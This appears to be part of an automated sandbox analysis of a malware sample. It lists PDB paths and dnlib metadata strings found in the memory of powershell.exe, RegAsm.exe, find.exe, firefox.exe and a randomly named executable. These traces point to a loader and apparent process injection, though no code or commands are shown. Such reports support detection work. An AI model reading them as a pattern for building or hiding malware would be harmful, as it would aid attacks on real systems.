            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: find.exe, 0000000D.00000002.621202000.000000000278C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000D.00000002.620947372.000000000056B000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.480001579.0000000002B6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.521681505.000000000084C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: find.pdb source: RegAsm.exe, 0000000B.00000002.466574369.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000002.620877764.0000000000654000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wfbjvizcWo.exe, 0000000C.00000002.620770237.00000000000FE000.00000002.00000001.01000000.00000008.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479928036.00000000000FE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: find.pdbN source: RegAsm.exe, 0000000B.00000002.466574369.000000000052D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
